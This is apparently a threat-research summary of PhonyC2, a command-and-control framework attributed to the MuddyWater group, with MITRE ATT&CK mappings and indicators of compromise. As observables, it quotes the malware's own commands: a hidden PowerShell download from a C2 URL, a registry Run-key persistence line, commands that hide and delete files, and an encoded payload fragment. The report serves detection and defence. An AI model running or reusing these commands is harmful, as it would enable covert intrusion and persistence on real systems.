Threat Research

PhonyC2: Revealing a New Malicious Command & Control Framework by MuddyWater | Deep Instinct

Securonix

Deep Instinct researchers uncovered PhonyC2, a custom, continuously evolving C2 framework used by MuddyWater since 2021, including in an attack on the Technion and ongoing PaperCut exploitation. The analysis details the framework’s code, infection flow, persistence techniques, and MITRE technique mappings. #PhonyC2 #MuddyWater #Technion #PaperCut

Keypoints

  • MuddyWater (aka Mango Sandstorm) operates under Iran’s MOIS and has introduced PhonyC2, a new C2 framework used since at least 2021.
  • PhonyC2 was involved in the Technion Institute attack and is currently active in a PaperCut exploitation campaign.
  • PhonyC2 is designed to be continuously updated to evade detection, with evolving TTPs documented across code leaks and investigations.
  • The framework mirrors MuddyC3 in design and purpose, but is written in Python3 and features components like Please_Run_Once.py, main.py, webserver.py, and commandline.py.
  • Initial access relies on social engineering; persistence and payload delivery leverage registry, PowerShell, and decoy/config mechanisms.
  • MITRE ATT&CK techniques mapped to PhonyC2 include Web Protocols, Data Encoding, Ingress Tool Transfer, Boot/Startup Registry, PowerShell, Hidden Artifacts/Window, File Deletion, and Modify Registry.
  • Indicative IOCs include multiple IPs, domains (e.g., 6nc*.co), and file hashes/names such as db.ps1, db.sqlite, and utils.jse.

MITRE Techniques

  • [T1071.001] Application Layer Protocol: Web Protocols – Phony C2 uses HTTP to download obfuscated payload. “Phony C2 uses HTTP to download obfuscated payload” – Observable: http://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTRD6OZ
  • [T1132.002] Data Encoding: Non-Standard Encoding – Phony C2 payload is obfuscated using a custom encoding. “Phony C2 payload is obfuscated using a custom encoding” – Observable: ,15555554155555554,14((1414,1554(14(,1554(14(,15415554,1554(14(,1414(,154((154,154154((,1554(154,1414(,14(14((,14((((14,154(14((,154(14((,1554(14(,154(1414,1554(154,1554(154,14(((((,1555414,14(((((,14((14(,15414(((,155414((,
  • [T1105] Ingress Tool Transfer – Phony C2 has the ability to download payloads from the C2 server. “Phony C2 has the ability to download payloads from the C2 server” – Observable: http://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTRD6OZ
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Phony C2 has the ability to add persistence mechanisem. “Phony C2 has the ability to add persistence mechanisem” – Observable: reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v NEW /d C:intelutilsutils.jse /f
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Phony C2 is executed by PowerShell and is executing PowerShell commands. “Phony C2 is executed by PowerShell and is executing PowerShell commands” – Observable: powershell Start-Job -ScriptBlock {Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://172.16.162.1:1337/562a2ffe-a45a-4318-864b-5942fbd0a859.aspx?LY6EDE1KTNE=LY6EDE1KTNE -OutFile $input } -InputObject “c:programdatadb.sqlite”;sleep 6
  • [T1564.001] Hide Artifacts: Hidden Files and Directories – Phony C2 is setting hidden attribute to files in C:ProgramData. “Phony C2 is setting hidden attribute to files in C:ProgramData” – Observable: attrib +h c:programdatadb.sqlite
  • [T1564.003] Hide Artifacts: Hidden Window – Phony C2 is executed to hide the PowerShell window. “Phony C2 is executed to hide the PowerShell window” – Observable: powershell -EP BYPASS -NoP -W 1
  • [T1070.004] Indicator Removal: File Deletion – PhonyC2 deletes files after execution. “rm c:programdatadb.sqlite ; rm c:programdatadb.ps1” – Observable: file deletions shown
  • [T1112] Modify Registry – PhonyC2 creates registry entries to achieve persistence. “New-ItemProperty -Path “HKLM:SOFTWAREiCXqExISMHV” -Name “fmoopWgmBla” -Value ‘$p_id =…’” – Observable: registry writes

Indicators of Compromise

  • [IP Address] PhonyC2 V6 (PaperCut) – 45.159.248[.]244, and 91.121.240[.]104, and 195.20.17[.]44 (Suspected PhonyC2)
  • [IP Address] MuddyWater infrastructure / Technion activity – 45.86.230[.]20, 194.61.121[.]86, and 46.249.35[.]243
  • [Domain] PhonyC2-related domains – 6nc051221c.co, 6nc110821hdb.co, am1211.iransos.me
  • [File Hash] db.ps1 – 7cb0cc6800772e240a12d1b87f9b7561412f44f01f6bb38829e84acbc8353b9c; db.sqlite – 5ca26988b37e8998e803a95e4e7e3102fed16e99353d040a5b22aa7e07438fea; utils.jse – 1c95496da95ccb39d73dbbdf9088b57347f2c91cf79271ed4fe1e5da3e0e542a
  • [File Name] db.ps1, db.sqlite, and utils.jse – files generated by PhonyC2 framework observed in investigations

Read more: https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint